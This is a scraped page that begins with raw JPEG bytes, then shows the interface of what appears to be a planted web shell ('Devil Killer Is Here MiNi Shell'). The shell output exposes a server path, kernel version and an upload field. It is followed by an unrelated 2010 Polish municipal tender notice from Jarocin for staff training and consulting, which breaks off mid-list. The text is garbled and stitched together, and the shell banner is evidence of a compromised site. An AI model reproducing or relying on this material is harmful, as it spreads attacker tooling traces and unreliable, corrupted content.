JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101014/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101014/331602-N-2010.html

<p class="kh_header"><b>Jarocin: Wzmocnienie potencjału administracji samorządowej w ramach Programu Operacyjnego Kapitał Ludzki</b><br>
<b>Numer ogłoszenia: 331602 - 2010; data zamieszczenia: 14.10.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Jarocin , Al. Niepodległości 10, 63-200 Jarocin, woj. wielkopolskie, tel. 062 7472611, faks 062 7472225.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.jarocin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wzmocnienie potencjału administracji samorządowej w ramach Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres tematyczny zamówienia obejmuje 2 części. 

ZADANIE CZĘŚCIOWE NR  1

Przedmiotem  zamówienia jest przygotowanie i przeprowadzenie szkoleń dla urzędniczek 
i urzędników Urzędu Miejskiego w Jarocinie wraz z zapewnieniem noclegu i cateringu. 
Każde szkolenie musi być przeprowadzone przy udziale dwóch trenerów.
Wykonawca nie pobiera żadnych opłat od uczestników szkolenia. 

Wykonawca w dniu podpisania umowy zobowiązany jest do złożenia szczegółowego harmonogramu realizacji szkoleń dla każdej grupy szkoleniowej, stanowiącego załącznik nr 1 do umowy. 


PLANOWANE SZKOLENIA:
1.Szkolenie z zakresu Obsługi Klienta:
Termin realizacji: 4 szkolenia dwudniowe zgodnie z załączonym harmonogramem
W szkoleniu bierze udział  60 osób (4 grupy x 15 osób). 
Wykonawca przygotuje merytorycznie 3 komplety merytorycznych materiałów wraz 
z ćwiczeniami i podręcznikiem. 

Wykonawca w kosztach realizacji zadania uwzględni:
a.wynajem sali dla szkolenia;
b.wyżywienie uczestników na 4 dwudniowych szkoleniach - łącznie 30 osób,
c.zakup noclegów dla 30 uczestników szkolenia. 

Celem niniejszych szkoleń jest podniesienie poziomu Obsługi Klienta w Urzędzie Miejskim w Jarocinie, zwiększenie poziomu satysfakcji zarówno urzędników, jak i Klientów Urzędu, usprawnienie i przyspieszenie tempa wydawania decyzji administracyjnych w Urzędzie Miejskim w Jarocinie  z zachowaniem zasad I Filaru Dobrego Rządzenia, wypracowanie i ujednolicenie standardów obsługi klienta zewnętrznego w Urzędzie Miejskim w Jarocinie - stworzenie zestawu dobrych praktyk, a także poinformowanie i przygotowanie pracowników do oceny ich pracy przez Klientów Urzędu - w ramach satysfakcji klientów.

2.Szkolenie menadżerskie dla kadry zarządzającej Urzędem:
Termin realizacji: 6 szkoleń dwudniowych zgodnie z załączonym harmonogramem
Szkolenie przewidziane jest na 18 osób (2 grupy x 9 osób).
Temat szkolenia:
a.Narzędziowy Trening Menadżerski,
b.Szef a rozwój pracowników,
c.Szef w procesie uczenia pracowników.

Wykonawca w kosztach realizacji zadania uwzględni:
a.wynajem sali dla szkolenia;
b.wyżywienie uczestników w ciągu 12 dni szkoleń - łącznie 18 osób,
c.zakup noclegów dla 18  uczestników szkolenia. 

Celem niniejszych szkoleń jest głównie wzmocnienie szczebla kierowniczego 
w Urzędzie, podniesienie poziomu realizowanych działań zgodnie z II Filarem Dobrego Rządzenia, zwiększenie efektywności pracy kierowników oraz podległych im zespołów, a także podniesienie poziomu umiejętności radzenia sobie w trudnych sytuacjach kierownik - pracownik.

3.Szkolenie Komunikacja i zespołowość:
Termin realizacji: 6 szkoleń dwudniowych zgodnie z załączonym harmonogramem
W szkoleniu biorą udział wszyscy pracownicy Urzędu Miejskiego w Jarocinie - 80 osób (6 grup x ok. 13 osób). 
Wykonawca przygotuje 80 sztuk materiałów i wydruków dla uczestników szkolenia. 

Wykonawca w kosztach realizacji zadania uwzględni:
a.wynajem sali dla szkolenia;
b.wyżywienie uczestników w ciągu 12 dni szkoleń - łącznie 80 osób,
c.zakup noclegów dla 80  uczestników szkolenia. 

Celem szkolenia jest wzrost efektywności pracy w zadaniach zespołowych wymagających współpracy, poprawa sprawności komunikacji w zespołach projektowych i zadaniowych realizujących politykę Urzędu, przekazanie uczestnikom konkretnych narzędzi interpersonalnych radzenia sobie w trudnych sytuacjach, podniesienie stopnia identyfikacji pracowników z Urzędem Miejskim w Jarocinie, 
a także ułatwienie procesu wdrażania efektywnego opisu stanowisk (w szczególności ewentualnych zmian w zespołach) oraz wdrożenia na szczeblu praktycznym procedur związanych z kodeksem etycznym.

Wykonawca w cenie ofertowej musi uwzględnić koszt przygotowania merytorycznego 
3 kompletów merytorycznych materiałów wraz z ćwiczeniami i podręcznikiem, tj. podręcznik i ćwiczenia oddzielnie dla szkolenia z zakresu Obsługi klienta, szkoleń menedżerskich oraz szkolenia z zakresu komunikacji i zespołowości. 
Każdy uczestnik szkolenia powinien otrzymać komplet szkoleniowy, tj. podręcznik 
i ćwiczenia.

Po każdym przeprowadzonym szkoleniu Wykonawca zobowiązany jest przeprowadzić ankiety ewaluacyjne pośród uczestników szkolenia, stworzyć raporty trenerów, które z kolei będą stanowić materiał wyjściowy do podsumowania rezultatów twardych i miękkich po całym cyklu szkoleń.

WAŻNE!!!
Szkolenie z zakresu Obsługi Klienta oraz Szkolenie Komunikacja i zespołowość musi być realizowane na terenie miasta Jarocin, w obiekcie do tego przystosowanym, tzn. posiadającym salę wykładową przystosowaną do kształcenia osób dorosłych, wyposażona 
w niezbędny sprzęt techniczny wymieniony poniżej. 

W zakres usługi hotelarsko-gastronomicznej będzie wchodziło:
a.zapewnienie zakwaterowania dla uczestników szkolenia w godzinach szkoleniowych w pokojach 2 osobowych  z pełnym węzłem sanitarnym, 
zapewnienie pełnego wyżywienia dla uczestników dwudniowych szkoleń tzn.:
-  pierwszy dzień szkoleniowy - dwudaniowy obiad z napojami, kolacja,
- drugi dzień szkoleniowy -  śniadanie, dwudaniowy obiad z napojami;
b.zapewnienie całodziennego ciągłego serwisu kawowego podczas szkoleń, w ramach którego oferowana będzie minimum: kawa, herbata, cukier, śmietanka lub mleko, woda mineralna gazowana i niegazowana, ciasteczka słodkie lub ciasta dla uczestników szkoleń.

Ponadto oferent zobowiązany jest do:
a.udostępnienia nieodpłatnie na terenie hotelu sali szkoleniowej mogącej pomieścić 
co najmniej 20 osób w układzie umożliwiającym pracę warsztatową; sala powinna być wyposażona minimum w: stoliki, krzesełka, nagłośnienie, ekran, gniazdka umożliwiające podłączenie rzutnika multimedialnego i laptopa oraz posiadać klimatyzację; sala powinna być dostępna dla uczestników szkoleń w godzinach szkolenia oraz dla trenerów przynajmniej na 1 godzinę przed i po zakończeniu zajęć,

b.uwzględnienia w ramach wyżywienia dla uczestników, po uprzednim zawiadomieniu przez organizatora szkolenia, specjalnych wymagań związanych z dietą wegetariańską, wegańską, jarską itp.


ZADANIE CZĘŚCIOWE NR 2

Zadanie częściowe nr 2 obejmuje swoim zakresem następujące czynności:
1.wykonanie aktualizacji opisu stanowisk w Urzędzie Miejskim w Jarocinie wraz 
z badaniem luk kompetencyjnych i szczegółowych potrzeb szkoleniowych. Przeprowadzenie niniejszej czynności ma na celu usprawnienie prac, wydawanie efektywniejszych decyzji administracyjnych, porównanie stanowisk i obowiązków urzędników oraz wyszukanie luk lub dublowanie się określonych zajęć i eliminacja takich obszarów. Uporządkowanie zakresów obowiązków przyczyni się w dużym stopniu do lepszego uszeregowania hierarchii stanowisk oraz ułatwi dystrybucję nowych zadań, przydział do projektów wewnętrznych i zewnętrznych Urzędu oraz pomoże w jeszcze lepszej dystrybucji wewnętrznych środków finansowych. 

Niniejsza czynność wymagać będzie ok. 200 - 300 godzin pracy konsultantów na co składać się powinny między innymi: wywiady, przygotowanie kart opisu stanowisk, szkolenia wewnętrzne dotyczące wypełniania kart, rozmowy z kierownictwem, weryfikacja z istniejącymi dokumentami w Urzędzie Miejskim w Jarocinie. 
Efektem przedmiotowej czynności powinien być opracowany kompleksowy raport 
z aktualnym opisem stanowisk.

2)	Konsultacje(ok. 120h) z praktycznych aspektów stosowania Kodeksu Postępowania Administracyjnego, które maja na celu ułatwić przeprowadzenie procedury wydawania decyzji administracyjnych w Urzędzie Miejskim w Jarocinie - doradztwo prawne

3)	Kompleksowe badanie satysfakcji klientów przeprowadzone między klientami Urzędu Miejskiego. Badanie satysfakcji klientów powinno przyjąć formę rozmów telefonicznych, ankiet, wywiadów. Przeprowadzone badanie powinno pokazać pełen obraz stanu rzeczywistego , wskazać obszary do poprawy oraz ma sprawdzić oddziaływanie szkoleń z Obsługi Klienta  i pozostałych szkoleń  wpływających na podniesienie jakości pracy Urzędu. Przeprowadzone badanie powinno być uzupełnieniem oraz powinno wskazać  różnice postrzegania pracy Urzędu Miejskiego w Jarocinie przez mieszkańców pomiędzy przełomem 2008/2009 roku a rokiem 2011. Na przełomie 2008/2009 Urząd Miejski w Jarocinie przeprowadził badanie opinii mieszkańców gminy Jarocin na temat szeroko rozumianego zadowolenia z działań Gminy, w tym również z pracy Urzędu Miejskiego w Jarocinie. Wykonawca zobowiązany jest sporządzić raport, spełniający następujące zadania: 
- raport powinien posłużyć jako wdrożenie systemu monitorowania usług publicznych/satysfakcji klienta (zgodnie z 2 Filarem Państwa Prawa Skuteczność 
i Efektywność),
- poprzez przygotowanie i wprowadzenie do trwałego wykorzystania systemu ewaluacji pracy urzędników, będzie możliwość sprawdzenia różnic oceny i opinii mieszkańców przed i po przeprowadzonych szkoleniach z Obsługi Klienta,
- pokaże realną zmianę wobec danych  z końca 2008 roku.
Badaniu satysfakcji klientów będzie towarzyszyło wdrożenie systemu monitorowania usług publicznych i poprawa wskaźników jakości świadczonych usług poprzez specjalistyczne konsultacje w wymiarze 150 h, które doprowadzą do ustalenia kluczowych wskaźników (benchmarking).
4)	Aktualizacja Kodeksu Etycznego Pracowników Urzędu Miejskiego w Jarocinie oraz Kodeksu Postępowania Etycznego w Urzędzie Miejskim w Jarocinie o procedury mówiące o konsekwencjach złamania przez pracownika zasad etycznych. Zadaniem nadrzędnym jest uzupełnienie Kodeksu Etycznego o procedury, które wskazać mogą dokładnie jakie działania, kto, w jakim terminie może podjąć wobec pracowników UMJ łamiących zawarte w tych dokumentach normy. Powstałe narzędzie powinno się przyczynić się w sposób znaczący do usprawnień w zakresie podejmowania decyzji dyscyplinarnych i motywacyjnych w UMJ.

5)	Doradztwo w zakresie sporządzania Planu Rozwoju Lokalnego , tj. dokumentu , który w sposób kompleksowy będzie wskazywał kierunki przemian w UM oraz będzie uszczegółowieniem istniejącej Strategii Rozwoju Gminy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zadanie częściowe nr 1:
Zamawiający uzna ten warunek za spełniony jeżeli wykonawca wykaże się doświadczeniem w organizowaniu dwudniowych szkoleń dla grupy min. 10 osób, 
wraz z zapewnieniem noclegu, wyżywienia, sali szkoleniowej w okresie ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, min. 30 dni szkoleniowych. 

Zadanie częściowe nr 2:
Zamawiający uzna ten warunek za spełniony jeżeli:
- wykonawca wykaże się doświadczeniem polegającym na wykonywaniu stałej (trwającej nie krócej niż dwa lata) obsługi prawnej co najmniej 1 podmiotu jednostki samorządu terytorialnego,
- wykonawca wykaże się doświadczeniem polegającym na wykonywaniu 1 usługi polegającej na aktualizacji opisu stanowisk,
- wykonawca wykaże się doświadczeniem polegającym na wykonywaniu 1 usługi polegającej na doradztwie w zakresie sporządzania Programu Rozwoju Lokalnego,
- wykonawca wykaże się doświadczeniem polegającym na wykonywaniu 1 usługi polegającej na aktualizacji Kodeksu Etycznego,
- wykonawca wykaże się doświadczeniem polegającym na wykonywaniu 1 usługi polegającej na przeprowadzeniu badania - monitorowania satysfakcji klientów w jednostce samorządu terytorialnego,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zadanie częściowe nr 1:
Wykonawca dysponuje lub będzie dysponować co najmniej jedną osobą posiadającą doświadczenie w realizacji szkoleń tj. przeprowadziła co najmniej 5 szkoleń dla minimum 10 osób zatrudnionych w jednostkach administracji samorządowej każde,

Zadanie częściowe nr 2:
Wykonawca dysponuje lub będzie dysponować co najmniej jedną osobą czynnie działającą jako radca prawny/adwokat (wpisanym odpowiednio na listę radców prawnych/adwokatów prowadzoną przez właściwą Okręgową Izbę/Radę).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy nie stawia warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>WARUNKI ZMIANY UMOWY DLA ZADANIA CZĘŚCOWEGO I 
Zgodnie z art. 144 ust. 1 ustawy Prawo zamówień publicznych (Dz. U. 2007 Nr 223 poz. 1655 z późn. zm.) Zamawiający przewiduje zmiany postanowień zawartej umowy w stosunku do treści oferty w następujących przypadkach:
1)	dopuszczalna jest zmiana umowy polegająca na zmianie osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialne za świadczenie usług. Wykonawca może zmienić te osoby na prośbę tych osób oraz z przyczyn niezależnych od nich, tj. zdarzeń losowych (śmierć, choroba, zwolnienie) przy czym osoby zastępujące pierwotnie wskazane osoby w potencjale kadrowym będą musiały posiadać uprawnienia nie gorsze od nich.
2)	dopuszczalna jest zmiana umowy polegająca na zmianie wynagrodzenia za przedmiot zamówienia w przypadku gdy ulegną zmianie powszechnie obowiązujące przepisy 
w zakresie wysokości stawki podatku od towarów i usług na przedmiot świadczenia.;
3)	dopuszczalna jest zmiana umowy polegająca na zmianie danych Wykonawcy bez zmian samego Wykonawcy (np. zmiana siedziby, adresu, nazwy),
4)	dopuszczalne są zmiany postanowień umowy, które wynikają ze zmiany obowiązujących przepisów, jeżeli konieczne będzie dostosowanie postanowień umowy do nowego stanu prawnego,
5)	dopuszczalna jest zmiana numeru rachunku bankowego wykonawcy, podanego 
w umowie, w przypadku zmiany rachunku bankowego wykonawcy, na który następować ma zapłata wynagrodzenia za wykonanie przedmiotu niniejszego zamówienia,
6)	dopuszczalna jest zmiana umowy w razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy,
7)	dopuszczalna jest zmiana umowy, jeżeli konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy a  zmiany te są korzystne dla Zamawiającego,
8)	dopuszczalna jest zmiana harmonogramu realizacji szkoleń sporządzonego przez Wykonawcę, stanowiącego załącznik nr 1 do umowy,  jeżeli konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy tj. przyczyn organizacyjnych leżących po stronie Zamawiającego np. choroba pracowników.

WARUNKI ZMIANY UMOWY DLA ZADANIA CZĘŚCIOWEGO  II 
Zgodnie z art. 144 ust. 1 ustawy Prawo zamówień publicznych (Dz. U. 2007 Nr 223 poz. 1655 z późn. zm.) Zamawiający przewiduje zmiany postanowień zawartej umowy w stosunku do treści oferty w następujących przypadkach:
1)	dopuszczalna jest zmiana umowy polegająca na zmianie osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialne za świadczenie usług. Wykonawca może zmienić te osoby na prośbę tych osób oraz z przyczyn niezależnych od nich, tj. zdarzeń losowych (śmierć, choroba, zwolnienie) przy czym osoby zastępujące pierwotnie wskazane osoby w potencjale kadrowym będą musiały posiadać uprawnienia nie gorsze od nich.
2)	dopuszczalna jest zmiana umowy polegająca na zmianie wynagrodzenia za przedmiot zamówienia w przypadku gdy ulegną zmianie powszechnie obowiązujące przepisy 
w zakresie wysokości stawki podatku od towarów i usług na przedmiot świadczenia.;
3)	dopuszczalna jest zmiana umowy polegająca na zmianie danych Wykonawcy bez zmian samego Wykonawcy (np. zmiana siedziby, adresu, nazwy),
